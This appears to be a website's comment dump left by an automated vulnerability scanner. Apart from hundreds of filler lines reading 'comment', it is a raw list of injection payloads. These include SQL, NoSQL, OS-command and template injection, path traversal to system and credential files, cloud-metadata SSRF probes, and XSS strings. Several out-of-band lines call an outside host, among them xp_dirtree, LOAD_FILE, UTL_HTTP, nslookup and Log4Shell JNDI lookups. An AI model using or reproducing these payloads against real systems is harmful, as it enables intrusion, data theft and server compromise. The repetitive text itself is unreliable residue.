comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
commentx7x8brnl
x7yl17kl'”x7yl17kl
comment
comment
comment
comment
comment
comment
comment
‘comment
comment’
comment”
comment’
comment%’
comment
comment%u0027
comment%27
comment”
comment%”
comment
comment%u0022
comment%22
< /etc/passwd
a
b
1e309
char(0x27)char(0x27)comment
%u2018comment
%u2019comment
%u201acomment
%u201bcomment
%u201ccomment
%u201dcomment
%u201ecomment
— comment
/*comment
commentʼ
comment
{comment
{‘comment
{“comment
comment{
comment’}
comment”}
comment}
comment’}
comment”}
comment/
comment/’
comment/”
comment/
/’comment
comment/”
comment”}, {x7htbex6:{$meta: “textScore
comment’}, {x7h9jq7t:{$meta: ‘textScore
comment”}}, {x7iq01np:{$meta: “textScore
comment’}, {x7i7vuz5:{$meta: ‘textScore
comment’ AND ‘1’=’0
comment’ AND ‘1’=’1
comment” AND “1”=”0
comment” AND “1”=”1
comment’ AND 1=0/*
comment’ AND 1=1/*
comment’ AND 1=0)/*
comment’ AND 1=1)/*
comment’ AND 1=0–
comment’ AND 1=1–
comment’ AND 1=0)–
comment’ AND 1=1)–
comment’) AND (‘1’=’0
comment’) AND (‘1’=’1
comment”) AND (“1″”=”0
comment”) AND (“1″”=”1
comment’ AND 1=0 LIMIT 1–
comment’ AND 1=1 LIMIT 1–
REPEAT(0x636f6d6d656e74,2)
REPEAT(0x636f6d6d656e74,1)
comment OR 1=1
comment OR 1=0
comment’ OR ‘1’=’1
comment’ OR ‘1’=’0
comment” OR “1”=”1
comment” OR “1”=”0
comment’) OR (‘1’=’1
comment’) OR (‘1’=’0
comment”) OR (“1″=”1
comment”) OR (“1″=”0
comment’ OR 1=1 ##
comment’ OR 1=0 ##
comment’ OR 1=1 —
comment’ OR 1=0 —
comment’ OR ‘1’=’0
comment’ OR ‘1’=’1
comment” OR “1”=”0
comment” OR “1”=”1
comment’) OR (‘1’=’0
comment’) OR (‘1’=’1
comment”) OR (“1″=”0
comment”) OR (“1″=”1
comment’ OR 1=0 ##
comment’ OR 1=1 ##
comment’ OR 1=0 —
comment’ OR 1=1 —
comment’) AND ‘1’ in (‘0
comment’) AND ‘1’ in (‘1
comment”) AND “1” in (“0
comment”) AND “1” in (“1
comment’) OR ‘1’ in (‘0
comment’) OR ‘1’ in (‘1
comment”) OR “1” in (“0
comment”) OR “1” in (“1
comment DESC
comment ASC
1, comment DESC
1, comment ASC
comment and 1 in (select BENCHMARK(1,AES_DECRYPT(AES_ENCRYPT(‘EncryptedString’,’EncryptionKey’),’EncryptionKey’)) ) —
comment and 1 in (select BENCHMARK(1,AES_DECRYPT(AES_ENCRYPT(‘EncryptedString’,’EncryptionKey’),’EncryptionKey’)) ) —
comment and 1 in (select BENCHMARK(1,AES_DECRYPT(AES_ENCRYPT(‘EncryptedString’,’EncryptionKey’),’EncryptionKey’)) ) —
comment and 1 in (select BENCHMARK(200000,AES_DECRYPT(AES_ENCRYPT(‘EncryptedString’,’EncryptionKey’),’EncryptionKey’)) ) —
comment and 1 in (select BENCHMARK(218687,AES_DECRYPT(AES_ENCRYPT(‘EncryptedString’,’EncryptionKey’),’EncryptionKey’)) ) —
comment and 1 in (select BENCHMARK(1,AES_DECRYPT(AES_ENCRYPT(‘EncryptedString’,’EncryptionKey’),’EncryptionKey’)) ) —
comment and 1 in (select BENCHMARK(200000,AES_DECRYPT(AES_ENCRYPT(‘EncryptedString’,’EncryptionKey’),’EncryptionKey’)) ) —
comment’ and 1 in (select BENCHMARK(1,AES_DECRYPT(AES_ENCRYPT(‘EncryptedString’,’EncryptionKey’),’EncryptionKey’))) —
comment’ and 1 in (select BENCHMARK(1,AES_DECRYPT(AES_ENCRYPT(‘EncryptedString’,’EncryptionKey’),’EncryptionKey’))) —
comment’ and 1 in (select BENCHMARK(1,AES_DECRYPT(AES_ENCRYPT(‘EncryptedString’,’EncryptionKey’),’EncryptionKey’))) —
comment’ and 1 in (select BENCHMARK(200000,AES_DECRYPT(AES_ENCRYPT(‘EncryptedString’,’EncryptionKey’),’EncryptionKey’))) —
comment’ and 1 in (select BENCHMARK(101335,AES_DECRYPT(AES_ENCRYPT(‘EncryptedString’,’EncryptionKey’),’EncryptionKey’))) —
comment’ and 1 in (select BENCHMARK(116965,AES_DECRYPT(AES_ENCRYPT(‘EncryptedString’,’EncryptionKey’),’EncryptionKey’))) —
comment’ and 1 in (select BENCHMARK(195831,AES_DECRYPT(AES_ENCRYPT(‘EncryptedString’,’EncryptionKey’),’EncryptionKey’))) —
comment’ and 1 in (select BENCHMARK(108575,AES_DECRYPT(AES_ENCRYPT(‘EncryptedString’,’EncryptionKey’),’EncryptionKey’))) —
comment’ and 1 in (select BENCHMARK(1,AES_DECRYPT(AES_ENCRYPT(‘EncryptedString’,’EncryptionKey’),’EncryptionKey’))) —
comment’ and 1 in (select BENCHMARK(108575,AES_DECRYPT(AES_ENCRYPT(‘EncryptedString’,’EncryptionKey’),’EncryptionKey’))) —
comment’ and 1 in (select*from(select(sleep(00)))a) —
comment’ and 1 in (select*from(select(sleep(05)))a) —
‘ (select*from(select(sleep(00)))a) ‘
‘ (select*from(select(sleep(05)))a) ‘
comment’);WAITFOR DELAY ’00:00:00′–
comment’);WAITFOR DELAY ’00:00:05′–
comment’ OR 1=1 ##
comment’ OR 1=0 ##
comment’ OR 1=1 —
comment’ OR 1=0 —
comment AND pg_sleep(00) is not null
comment AND pg_sleep(05) is not null
comment ‘;select pg_sleep(00);– –
comment ‘;select pg_sleep(05);– –
comment ;select pg_sleep(00);– –
comment ;select pg_sleep(05);– –
http://appspidered.rapid7.com/
http://169.254.169.254/latest/meta-data/
http://169.254.169.254/latest/meta-data/ami-id
http://169.254.169.254/latest/meta-data/reservation-id
http://169.254.169.254/latest/meta-data/hostname
http://169.254.169.254/latest/meta-data/network/interfaces/macs/
http://169.254.169.254/latest/meta-data/public-keys/0/openssh-key
http://169.254.169.254/latest/dynamic/instance-identity/document
http://169.254.169.254/metadata/instance/compute?api-version=2019-08-15
http://169.254.169.254/metadata/instance/network/interface/0/ipv4/ipAddress/0?api-version=2019-08-15
http://169.254.169.254/metadata/instance/network/interface/0?api-version=2019-08-15
‘comment
comment’
comment”
comment’
comment%’
comment
comment%u0027
comment%27
comment%”
comment
comment%u0022
comment%22
LIMIT a
1e309
char(0x27)char(0x27)comment
%u2018comment
%u2019comment
%u201acomment
%u201bcomment
%u201ccomment
%u201dcomment
%u201ecomment
— comment
/*comment
commentʼ
comment’ UNION ALL select NULL —
comment” UNION ALL select NULL —
SELECT * FROM “master”
SELECC * FROM “ds”
x7edr5dh
x7ezmrez
x7fghkrd: x7fghkrd
comment”
comment’
comment
comment$0
comment;/etc/passwd
comment|/bin/cat /etc/passwd
comment|/bin/cat /etc/passwd|
comment;/etc/hosts
comment|/bin/cat /etc/hosts
comment|/bin/cat /etc/hosts|
comment;/usr/bin/id
comment|/bin/cat /usr/bin/id
comment|/bin/cat /usr/bin/id|
type c:\boot.ini
comment&dir
comment&ipconfig
echo foobar x7nu9rvu
comment&& echo foobar x7oj8rco
comment| echo foobar x7o03ko2
comment| echo foobar x7phyd06|
comment< echo foobar x7p1a3p2
netstat -na
comment&&netstat -na
comment|netstat -na
comment|netstat -na|
comment;netstat ;
comment<netstat -na
ping -h
comment&&ping -h
comment|ping -h
comment|ping -h|
comment<ping -h
$LANG
comment&&$LANG
comment|$LANG
comment|$LANG|
comment<$LANG
; free
;ping localhost -c 21;
;TIMEOUT /T 10 /NOBREAK;
wp-comments-post.php
/etc/passwd
\WINDOWS\system32\drivers\etc\hosts
C:\WINDOWS\system32\drivers\etc\hosts
..\..\..\..\..\..\WINDOWS\system32\drivers\etc\hosts
..\..\..\..\..\..\WINDOWS\system32\drivers\etc\hosts.htm
wp-comments-post.php
/wp-comments-post.php
../../../../../../../../../../etc/hosts
< /etc/passwd
/.
\.
c:\.
http://appspidered.rapid7.com/
http://appspidered.rapid7.com/
appspidered.rapid7.com/
wp-comments-post.php.
../wp-comments-post.php.
../../wp-comments-post.php.
c:\boot.ini.
c:\boot.ini
d:\boot.ini
../../../../../../boot.ini.
../../../../../../boot.ini
noexistnoexist.
../../../../../../../../../../etc/hosts.
/..
\..
c:\..
/../../../../../../../../../../..
/etc/passwd
file:/etc/passwd
file:/wp-comments-post.php
/WEB-INF/web.xml
WEB-INF/web.xml
file:WEB-INF/web.xml
/../../WEB-INF/web.xml
\WEB-INF\web.xml
/../../../../../../../../../../.
noexistnoexist
/.
/.
http://localhost/
http://localhost:22/
package.json.bak
package.json.bak
package.json.bak%00
../wp-config.php
http://appspidered.rapid7.com/rfi/x7qe2vqa
/../../../../../../../../../../vendor.js
../../../../../
..\..\..\..\..\
http://appspidered.rapid7.com/xss/script/411bfbd23d999db1e6b73925aff339e3fa92ca0e
http://appspidered.rapid7.com/xss/script/401d6a1c959442e51b3550a239e6964cfb2dfa60
http://appspidered.rapid7.com/xss/script/2ae61ff88e6183c2a5dbd21ce68cde051cc30048
http://appspidered.rapid7.com/xss/script/77d8a4dc495b1ce653a92c739e6868fb988e8b01
https://appspidered.rapid7.com/xss/script/bc19cf651a981795194a30a6abb8d10dc22c0505
https://appspidered.rapid7.com/xss/script/cfd7c3ea03a78d1bf50ed1dc217f2b2952c1955d
https://appspidered.rapid7.com/xss/script/28ad72d2482207433451e77ebe0ba8b270d0ce66
https://appspidered.rapid7.com/xss/script/c182130bd274cb3cf9114a676e04743a886d4cb6
http://appspidered.rapid7.com/xss/script/634974f829097fe9918fe8eef9fe9cd62075ea09
http://appspidered.rapid7.com/xss/script/944c9029c525acda34468f277980e4e532c1ca0f
http://appspidered.rapid7.com/xss/script/d5b059d59c7fa1c845107cd3baa421499b06bd9b
http://appspidered.rapid7.com/xss/script/623a249336773d3c6a1eaf861df5a54bbce41fef
https://appspidered.rapid7.com/xss/script/dfaa5699067b7c4b88f27111209d27ae9c32b8fc
https://appspidered.rapid7.com/xss/script/a9ee4214d00534a69662c500f3a46c560f6ed5f7
https://appspidered.rapid7.com/xss/script/58a909852812f5aab5b6eee713bf13e554d5359c
https://appspidered.rapid7.com/xss/script/1caeeeb7d3b670278a5592b2e519fd6e9a53d1e7
appspidered.rapid7.com/xss/script/847c0d19dd161561fb0091dcdf45064a8863563a
appspidered.rapid7.com/xss/script/4612d481852a87986fab91cfc5517eb1aae20289
appspidered.rapid7.com/xss/script/c2a448dd3d4d56c39e8bef98b7cff287e736bd9c
appspidered.rapid7.com/xss/script/5b1866264e9188153265bd9c1258e6e20ada464d
alert(2130165)
alert(2240775)
alert(2359578)
alert(2461992)
“>alert(2568506)
“>alert(2675014)
“>alert(2797907)
“>alert(2908516)
‘>alert(3023213)
‘>alert(3117431)
‘>alert(3232134)
‘>alert(3338644)
“>
“>
“>
“>
‘>
‘>
‘>
‘>
{constructor.constructor(4588106)}
{constructor.constructor(4776554)}
{constructor.constructor(4936320)}
{constructor.constructor(5075605)}
comment’;+exec+master..xp_dirtree+”//71915fdc1114fe51b91323662716bd60a1b350ae.oob.appspidered.rapid7.com/a”–
comment’;+SELECT+*+FROM+OPENROWSET(‘SQLOLEDB’,+’e16bf681e05bf0e47352c8c523645fd18fbf2882.oob.appspidered.rapid7.com’;’sa’;’pwd’,+’SELECT+1′)–
comment’;+SELECT+LOAD_FILE(‘\\\\1beca9a5cb51ee3a541f5c91039a4d9428a7e85b.oob.appspidered.rapid7.com\\a’)#
comment’;+SELECT+’hello’+INTO+DUMPFILE+’\\\\42b13b24fb89765e9ca0ba923c84e14dc23a2391.oob.appspidered.rapid7.com\\a’#
comment’;+copy+(SELECT+”)+to+program+’nslookup+15b20dade35096089c8a5bbf48e0b01a3d5844e0.oob.appspidered.rapid7.com’–
comment’+ORDER+BY+(CASE+WHEN+(1=0)+THEN+NULL+ELSE+UTL_HTTP.REQUEST(‘http://46542ef680073e74e3bccd5b3a1468d5b6360b0e.oob.appspidered.rapid7.com/’)+END)–
http://www.example.com/
https://example.com/
ftp://example.com/
http://example.com/
gopher://example.com/
example.com/
.example.com/
https://example.com/comment
comment” && sleep(00) && “1”!=”1
comment” && sleep(10000) && “1”!=”1
comment” && “1”==”0
comment” && “1”==”1
comment’ && ‘1’==’0
comment’ && ‘1’==’1
${applicationScope}
${requestScope}
${“asdflkj”.toString().replace(“d”,”x”)}
#{“asdflkj”.toString().replace(“d”,”x”)}
{{ 58719 * 21973 }}
{{ 62951705 + 74179523 }}
‘.phpinfo().’
*
|
comment|
&
comment&
comment)
!comment
commentcommentcomment
655321
./*][
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
${jndi:ldap://cc36b9e64428582894603c2fb06a8ed188437616.oob.appspidered.rapid7.${lower:COM}}
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
commentx7ysber5
x7zni45y'”x7zni45y
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment” && sleep(00) && “1”!=”1
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment” && “1”==”0
comment” && “1”==”1
comment’ && ‘1’==’0
comment’ && ‘1’==’1
alert(10691561)
alert(10941490)
alert(11101285)
alert(11261093)
“>alert(11424989)
“>alert(11597057)
“>alert(11781415)
“>alert(11945289)
‘>alert(12113269)
‘>alert(12268952)
‘>alert(12428728)
‘>alert(12613096)
“>
“>
“>
“>
‘>
‘>
‘>
‘>
{constructor.constructor(14919496)}
{constructor.constructor(15181669)}
{constructor.constructor(15439733)}
{constructor.constructor(15869881)}
x700i3ia<x700i3ia
x71ph2y0’x71ph2y0
x72hlfvo”x72hlfvo
x7282bo7>x7282bo7
x73y99cx
http://www.example.com/
https://example.com/
ftp://example.com/
http://example.com/
gopher://example.com/
example.com/
.example.com/
https://example.com/comment
‘comment
comment’
comment”
comment’
comment%’
comment
comment%u0027
comment%27
comment”
comment%”
comment
comment%u0022
comment%22
< /etc/passwd
a
b
1e309
char(0x27)char(0x27)comment
%u2018comment
%u2019comment
%u201acomment
%u201bcomment
%u201ccomment
%u201dcomment
%u201ecomment
— comment
/*comment
commentʼ
{comment
{‘comment
{“comment
{comment
{‘comment
{“comment
comment{
comment’}
comment”}
comment}
comment’}
comment”}
comment/
comment/’
comment/”
comment/
/’comment
comment/”
comment”}, {x7d0sfax:{$meta: “textScore
comment’}, {x7ew83t9:{$meta: ‘textScore
comment”}}, {x7fruc33:{$meta: “textScore
comment’}, {x7gkj64a:{$meta: ‘textScore
http://appspidered.rapid7.com/
http://169.254.169.254/latest/meta-data/
http://169.254.169.254/latest/meta-data/ami-id
http://169.254.169.254/latest/meta-data/reservation-id
http://169.254.169.254/latest/meta-data/hostname
http://169.254.169.254/latest/meta-data/network/interfaces/macs/
http://169.254.169.254/latest/meta-data/public-keys/0/openssh-key
http://169.254.169.254/latest/dynamic/instance-identity/document
http://169.254.169.254/metadata/instance/compute?api-version=2019-08-15
http://169.254.169.254/metadata/instance/network/interface/0/ipv4/ipAddress/0?api-version=2019-08-15
http://169.254.169.254/metadata/instance/network/interface/0?api-version=2019-08-15
*
|
comment|
&
comment&
comment)
!comment
${jndi:ldap://d29ed81cb581dc18533cf4918ab19aeec16be009.oob.appspidered.rapid7.${lower:COM}}
comment$0
comment;/etc/passwd
comment|/bin/cat /etc/passwd
comment|/bin/cat /etc/passwd|
comment;/etc/hosts
comment|/bin/cat /etc/hosts
comment|/bin/cat /etc/hosts|
comment;/usr/bin/id
comment|/bin/cat /usr/bin/id
comment|/bin/cat /usr/bin/id|
type c:\boot.ini
comment&dir
comment&ipconfig
echo foobar x75as1ee
comment&& echo foobar x75zr0vt
comment| echo foobar x76tqs2b
comment| echo foobar x77npk8f|
comment< echo foobar x78t5u5d
netstat -na
comment&&netstat -na
comment|netstat -na
comment|netstat -na|
comment;netstat ;
comment<netstat -na
ping -h
comment&&ping -h
comment|ping -h
comment|ping -h|
comment<ping -h
$LANG
comment&&$LANG
comment|$LANG
comment|$LANG|
comment<$LANG
; free
;ping localhost -c 21;
;TIMEOUT /T 10 /NOBREAK;
comment
comment’ AND ‘1’=’0
comment’ AND ‘1’=’1
comment” AND “1”=”0
comment” AND “1”=”1
comment’ AND 1=0/*
comment’ AND 1=1/*
comment’ AND 1=0)/*
comment’ AND 1=1)/*
comment’ AND 1=0–
comment’ AND 1=1–
comment’ AND 1=0)–
comment”) AND (“1″”=”1
comment’ AND 1=0 LIMIT 1–
